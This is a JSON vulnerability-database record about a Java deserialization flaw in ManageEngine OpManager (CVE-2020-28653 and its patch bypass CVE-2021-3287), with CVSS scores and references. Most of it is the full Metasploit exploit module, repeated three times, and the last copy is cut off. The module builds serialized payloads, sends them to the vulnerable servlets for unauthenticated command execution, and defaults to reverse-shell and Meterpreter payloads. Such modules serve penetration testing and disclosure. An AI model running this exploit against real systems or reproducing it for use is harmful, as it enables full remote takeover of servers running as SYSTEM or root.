{"id": "PACKETSTORM:164231", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ManageEngine OpManager SumPDU Java Deserialization", "description": "", "published": "2021-09-21T00:00:00", "modified": "2021-09-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html", "reporter": "Spencer McIntyre", "references": [], "cvelist": ["CVE-2020-28653", "CVE-2021-3287"], "immutableFields": [], "lastseen": "2021-09-21T16:00:31", "viewCount": 76, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-28653", "CVE-2021-3287"]}, {"type": "githubexploit", "idList": ["0F834290-5FF5-5671-950A-8A63A82265B0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/OPMANAGER_SUMPDU_DESERIALIZATION/"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_CVE-2020-28653.NBIN"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8FC7BBDB9A9C360054240EFAF9BA636"]}, {"type": "zdt", "idList": 
["1337DAY-ID-36780"]}]}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-28653"]}, {"type": "githubexploit", "idList": ["0F834290-5FF5-5671-950A-8A63A82265B0"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_CVE-2020-28653.NBIN"]}, {"type": "zdt", "idList": ["1337DAY-ID-36780"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": "https://packetstormsecurity.com/files/download/164231/opmanager_sumpdu_deserialization.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \ninclude Rex::Java \n \nJAVA_SERIALIZED_STRING = [ Serialization::TC_STRING, 0 ].pack('Cn') \nJAVA_SERIALIZED_STRING_ARRAY = \"\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\"\\ \n\"\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\".b \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine OpManager SumPDU Java Deserialization', \n'Description' => %q{ \nAn HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to \ndeserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS \ncommands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This \nvulnerability is also present in other products that are built on top of the OpManager application. This \nvulnerability affects OpManager versions 12.1 - 12.5.328. 
\n \nAutomatic CVE selection only works for newer targets when the build number is present in the logon page. Due \nto issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them \ntechnically being vulnerable. \n}, \n'Author' => [ \n'Johannes Moritz', # Original Vulnerability Research \n'Robin Peraglie', # Original Vulnerability Research \n'Spencer McIntyre' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], \n'Platform' => [ 'win', 'linux', 'python', 'unix' ], \n'References' => [ \n[ 'CVE', '2020-28653' ], # original CVE \n[ 'CVE', '2021-3287' ], # patch bypass \n[ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'Platform' => 'win', \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'Type' => :win_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows PowerShell', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win', \n'Type' => :win_psh, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Unix Command', \n{ \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'Type' => :nix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'linux', \n'Type' => :nix_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => 'wget', \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Python', \n{ \n'Arch' => ARCH_PYTHON, \n'Platform' => 'python', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultOptions' => { \n'RPORT' => 8060 \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' 
=> '2021-07-26', \n'Notes' => { \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Stability' => [ CRASH_SAFE ] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'OpManager path', '/']), \nOptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', [ 'Automatic', 'CVE-2020-28653', 'CVE-2021-3287' ] ]) \n]) \nend \n \ndef check \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'), \n'data' => build_java_serialized_int(1002) \n}) \nreturn Exploit::CheckCode::Unknown unless res \n# the patched version will respond back with 200 OK and no data in the response body \nreturn Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?(\"\\xac\\xed\\x00\\x05\".b) \n \nExploit::CheckCode::Detected \nend \n \ndef exploit \n# Step 1: Establish a valid HTTP session \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path), \n'keep_cookies' => true \n}) \nunless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/ \nfail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session') \nend \nprint_status('An HTTP session cookie has been issued') \nif (@vulnerability = datastore['CVE']) == 'Automatic' \n# if selecting the vulnerability automatically, use version detection \nif (version = res.body[%r{(?<=cachestart/)(\\d{6})(?=/cacheend)}]&.to_i).nil? 
\nfail_with(Failure::UnexpectedReply, 'Could not identify the remote version number') \nend \n \nversion = Rex::Version.new(\"#{version / 10000}.#{(version % 10000) / 1000}.#{version % 1000}\") \nprint_status(\"Detected version: #{version}\") \nif version < Rex::Version.new('12.1') \nfail_with(Failure::NotVulnerable, 'Versions < 12.1 are not affected by the vulnerability') \nelsif version < Rex::Version.new('12.5.233') \n@vulnerability = 'CVE-2020-28653' \nelsif version < Rex::Version.new('12.5.329') \n@vulnerability = 'CVE-2021-3287' \nelse \nfail_with(Failure::NotVulnerable, 'Versions > 12.5.328 are not affected by this vulnerability') \nend \nend \n \n# Step 2: Add the requestHandler to the HTTP session \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'), \n'keep_cookies' => true, \n'data' => build_java_serialized_int(1002) \n}) \nunless res&.code == 200 \nfail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session') \nend \nprint_status('The request handler has been associated with the HTTP session') \n \nif @vulnerability == 'CVE-2021-3287' \n# need to send an OPEN_SESSION request to the SUM PDU handler so the SUMServerIOAndDataAnalyzer object is \n# initialized and made ready to process subsequent requests \nsend_sumpdu(build_sumpdu(data: build_java_serialized_int(0))) \nend \n \n# Step 3: Exploit the deserialization vulnerability to run commands \ncase target['Type'] \nwhen :nix_dropper \nexecute_cmdstager \nwhen :win_dropper \nexecute_cmdstager \nwhen :win_psh \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nelse \nexecute_command(payload.encoded) \nend \nend \n \ndef build_java_serialized_int(int) \nstream = Serialization::Model::Stream.new \nstream.contents << Serialization::Model::BlockData.new(stream, [ int ].pack('N')) \nstream.encode \nend \n \ndef build_sumpdu(data: '') \n# build 
a serialized SUMPDU object with a custom data block \nsumpdu = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x27\\x63\\x6f\\x6d\\x2e\\x61\\x64\\x76\\x65\".b \nsumpdu << \"\\x6e\\x74\\x6e\\x65\\x74\\x2e\\x74\\x6f\\x6f\\x6c\\x73\\x2e\\x73\\x75\\x6d\\x2e\".b \nsumpdu << \"\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x2e\\x53\\x55\\x4d\\x50\\x44\\x55\\x24\".b \nsumpdu << \"\\x29\\xfc\\x8a\\x86\\x1b\\xfd\\xed\\x03\\x00\\x03\\x5b\\x00\\x04\\x64\\x61\\x74\".b \nsumpdu << \"\\x61\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x02\\x69\\x64\\x74\\x00\\x12\\x4c\\x6a\".b \nsumpdu << \"\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\".b \nsumpdu << \"\\x4c\\x00\\x08\\x75\\x6e\\x69\\x71\\x75\\x65\\x49\\x44\\x71\\x00\\x7e\\x00\\x02\".b \nsumpdu << \"\\x78\\x70\\x7a\" + [ 0x14 + data.length ].pack('N') \nsumpdu << \"\\x00\\x0c\\x4f\\x50\\x45\\x4e\\x5f\\x53\\x45\\x53\\x53\\x49\\x4f\\x4e\\x00\\x00\".b \nsumpdu << \"\\x00\\x00\" \nsumpdu << [ data.length ].pack('n') + data \nsumpdu << \"\\x78\".b \nsumpdu \nend \n \ndef send_sumpdu(sumpdu) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'), \n'keep_cookies' => true, \n'data' => [ sumpdu.length ].pack('N') + sumpdu \n}) \nres \nend \n \ndef execute_command(cmd, _opts = {}) \n# An executable needs to be prefixed to the command to make it compatible with the way in which the gadget chain \n# will execute it. 
\ncase target['Platform'] \nwhen 'python' \ncmd.prepend('python -c ') \nwhen 'win' \ncmd.prepend('cmd.exe /c ') \nelse \ncmd.gsub!(/\\s+/, '${IFS}') \ncmd.prepend('sh -c ') \nend \n \nvprint_status(\"Executing command: #{cmd}\") \n# the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the \n# dependency on the commons-collections library making it usable in this context \njava_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd) \n \nif @vulnerability == 'CVE-2020-28653' \n# in this version, the SUM PDU that is deserialized is the malicious object \nsum_pdu = java_payload \nelsif @vulnerability == 'CVE-2021-3287' \n# the patch bypass exploits a flaw in the ITOMObjectInputStream where it can be put into a state that allows \n# arbitrary objects to be deserialized by first sending an object of the expected type \npdu_data = build_java_serialized_int(2) # 2 is some kind of control code necessary to execute the desired code path \npdu_data << JAVA_SERIALIZED_STRING \npdu_data << JAVA_SERIALIZED_STRING \npdu_data << JAVA_SERIALIZED_STRING \npdu_data << JAVA_SERIALIZED_STRING_ARRAY \npdu_data << Serialization::TC_RESET \npdu_data << java_payload.delete_prefix(\"\\xac\\xed\\x00\\x05\".b) \nsum_pdu = build_sumpdu(data: pdu_data) \nend \n \nres = send_sumpdu(sum_pdu) \nfail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200 \nend \nend \n`\n", "_state": {"dependencies": 1647589307, "score": 0}}
{"metasploit": [{"lastseen": "2022-06-24T08:36:59", "description": "An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS commands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This vulnerability is also present in other products that are built on top of the OpManager application. This vulnerability affects OpManager versions 12.1 - 12.5.328. Automatic CVE selection only works for newer targets when the build number is present in the logon page. Due to issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them technically being vulnerable.\n", "cvss3": {}, "published": "2021-09-14T13:10:44", "type": "metasploit", "title": "ManageEngine OpManager SumPDU Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-28653", "CVE-2021-3287"], "modified": "2021-09-16T21:08:23", "id": "MSF:EXPLOIT-MULTI-HTTP-OPMANAGER_SUMPDU_DESERIALIZATION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/opmanager_sumpdu_deserialization/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n include Rex::Java\n\n JAVA_SERIALIZED_STRING = [ Serialization::TC_STRING, 0 ].pack('Cn')\n JAVA_SERIALIZED_STRING_ARRAY = \"\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\"\\\n \"\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\".b\n\n def initialize(info = {})\n super(\n 
update_info(\n info,\n 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',\n 'Description' => %q{\n An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to\n deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS\n commands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This\n vulnerability is also present in other products that are built on top of the OpManager application. This\n vulnerability affects OpManager versions 12.1 - 12.5.328.\n\n Automatic CVE selection only works for newer targets when the build number is present in the logon page. Due\n to issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them\n technically being vulnerable.\n },\n 'Author' => [\n 'Johannes Moritz', # Original Vulnerability Research\n 'Robin Peraglie', # Original Vulnerability Research\n 'Spencer McIntyre' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\n 'Platform' => [ 'win', 'linux', 'python', 'unix' ],\n 'References' => [\n [ 'CVE', '2020-28653' ], # original CVE\n [ 'CVE', '2021-3287' ], # patch bypass\n [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]\n ],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'win',\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows PowerShell',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n 
],\n [\n 'Unix Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'Type' => :nix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux',\n 'Type' => :nix_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => 'wget',\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Python',\n {\n 'Arch' => ARCH_PYTHON,\n 'Platform' => 'python',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 8060\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-07-26',\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Stability' => [ CRASH_SAFE ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'OpManager path', '/']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', [ 'Automatic', 'CVE-2020-28653', 'CVE-2021-3287' ] ])\n ])\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'data' => build_java_serialized_int(1002)\n })\n return Exploit::CheckCode::Unknown unless res\n # the patched version will respond back with 200 OK and no data in the response body\n return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?(\"\\xac\\xed\\x00\\x05\".b)\n\n Exploit::CheckCode::Detected\n end\n\n def exploit\n # Step 1: Establish a valid HTTP session\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path),\n 'keep_cookies' => true\n })\n unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/\n fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session')\n end\n print_status('An HTTP session cookie has been issued')\n if (@vulnerability = datastore['CVE']) == 'Automatic'\n # if selecting the vulnerability automatically, use version detection\n if (version = 
res.body[%r{(?<=cachestart/)(\\d{6})(?=/cacheend)}]&.to_i).nil?\n fail_with(Failure::UnexpectedReply, 'Could not identify the remote version number')\n end\n\n version = Rex::Version.new(\"#{version / 10000}.#{(version % 10000) / 1000}.#{version % 1000}\")\n print_status(\"Detected version: #{version}\")\n if version < Rex::Version.new('12.1')\n fail_with(Failure::NotVulnerable, 'Versions < 12.1 are not affected by the vulnerability')\n elsif version < Rex::Version.new('12.5.233')\n @vulnerability = 'CVE-2020-28653'\n elsif version < Rex::Version.new('12.5.329')\n @vulnerability = 'CVE-2021-3287'\n else\n fail_with(Failure::NotVulnerable, 'Versions > 12.5.328 are not affected by this vulnerability')\n end\n end\n\n # Step 2: Add the requestHandler to the HTTP session\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'keep_cookies' => true,\n 'data' => build_java_serialized_int(1002)\n })\n unless res&.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session')\n end\n print_status('The request handler has been associated with the HTTP session')\n\n if @vulnerability == 'CVE-2021-3287'\n # need to send an OPEN_SESSION request to the SUM PDU handler so the SUMServerIOAndDataAnalyzer object is\n # initialized and made ready to process subsequent requests\n send_sumpdu(build_sumpdu(data: build_java_serialized_int(0)))\n end\n\n # Step 3: Exploit the deserialization vulnerability to run commands\n case target['Type']\n when :nix_dropper\n execute_cmdstager\n when :win_dropper\n execute_cmdstager\n when :win_psh\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n else\n execute_command(payload.encoded)\n end\n end\n\n def build_java_serialized_int(int)\n stream = Serialization::Model::Stream.new\n stream.contents << Serialization::Model::BlockData.new(stream, [ int ].pack('N'))\n 
stream.encode\n end\n\n def build_sumpdu(data: '')\n # build a serialized SUMPDU object with a custom data block\n sumpdu = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x27\\x63\\x6f\\x6d\\x2e\\x61\\x64\\x76\\x65\".b\n sumpdu << \"\\x6e\\x74\\x6e\\x65\\x74\\x2e\\x74\\x6f\\x6f\\x6c\\x73\\x2e\\x73\\x75\\x6d\\x2e\".b\n sumpdu << \"\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x2e\\x53\\x55\\x4d\\x50\\x44\\x55\\x24\".b\n sumpdu << \"\\x29\\xfc\\x8a\\x86\\x1b\\xfd\\xed\\x03\\x00\\x03\\x5b\\x00\\x04\\x64\\x61\\x74\".b\n sumpdu << \"\\x61\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x02\\x69\\x64\\x74\\x00\\x12\\x4c\\x6a\".b\n sumpdu << \"\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\".b\n sumpdu << \"\\x4c\\x00\\x08\\x75\\x6e\\x69\\x71\\x75\\x65\\x49\\x44\\x71\\x00\\x7e\\x00\\x02\".b\n sumpdu << \"\\x78\\x70\\x7a\" + [ 0x14 + data.length ].pack('N')\n sumpdu << \"\\x00\\x0c\\x4f\\x50\\x45\\x4e\\x5f\\x53\\x45\\x53\\x53\\x49\\x4f\\x4e\\x00\\x00\".b\n sumpdu << \"\\x00\\x00\"\n sumpdu << [ data.length ].pack('n') + data\n sumpdu << \"\\x78\".b\n sumpdu\n end\n\n def send_sumpdu(sumpdu)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'),\n 'keep_cookies' => true,\n 'data' => [ sumpdu.length ].pack('N') + sumpdu\n })\n res\n end\n\n def execute_command(cmd, _opts = {})\n # An executable needs to be prefixed to the command to make it compatible with the way in which the gadget chain\n # will execute it.\n case target['Platform']\n when 'python'\n cmd.prepend('python -c ')\n when 'win'\n cmd.prepend('cmd.exe /c ')\n else\n cmd.gsub!(/\\s+/, '${IFS}')\n cmd.prepend('sh -c ')\n end\n\n vprint_status(\"Executing command: #{cmd}\")\n # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the\n # dependency on the commons-collections library making it usable in this context\n java_payload = 
Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)\n\n if @vulnerability == 'CVE-2020-28653'\n # in this version, the SUM PDU that is deserialized is the malicious object\n sum_pdu = java_payload\n elsif @vulnerability == 'CVE-2021-3287'\n # the patch bypass exploits a flaw in the ITOMObjectInputStream where it can be put into a state that allows\n # arbitrary objects to be deserialized by first sending an object of the expected type\n pdu_data = build_java_serialized_int(2) # 2 is some kind of control code necessary to execute the desired code path\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING_ARRAY\n pdu_data << Serialization::TC_RESET\n pdu_data << java_payload.delete_prefix(\"\\xac\\xed\\x00\\x05\".b)\n sum_pdu = build_sumpdu(data: pdu_data)\n end\n\n res = send_sumpdu(sum_pdu)\n fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-23T13:19:33", "description": "An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS commands in the context of the OpManager application. This vulnerability is also present in other products that are built on top of the OpManager application. 
This vulnerability affects OpManager versions 12.1 through 12.5.328.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "zdt", "title": "ManageEngine OpManager SumPDU Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3287", "CVE-2020-28653"], "modified": "2021-09-21T00:00:00", "id": "1337DAY-ID-36780", "href": "https://0day.today/exploit/description/36780", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n include Rex::Java\n\n JAVA_SERIALIZED_STRING = [ Serialization::TC_STRING, 0 ].pack('Cn')\n JAVA_SERIALIZED_STRING_ARRAY = \"\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\"\\\n 
\"\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\".b\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',\n 'Description' => %q{\n An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to\n deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS\n commands in the context of the OpManager application (NT AUTHORITY\\SYSTEM on Windows or root on Linux). This\n vulnerability is also present in other products that are built on top of the OpManager application. This\n vulnerability affects OpManager versions 12.1 - 12.5.328.\n\n Automatic CVE selection only works for newer targets when the build number is present in the logon page. Due\n to issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them\n technically being vulnerable.\n },\n 'Author' => [\n 'Johannes Moritz', # Original Vulnerability Research\n 'Robin Peraglie', # Original Vulnerability Research\n 'Spencer McIntyre' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\n 'Platform' => [ 'win', 'linux', 'python', 'unix' ],\n 'References' => [\n [ 'CVE', '2020-28653' ], # original CVE\n [ 'CVE', '2021-3287' ], # patch bypass\n [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]\n ],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'win',\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows PowerShell',\n {\n 
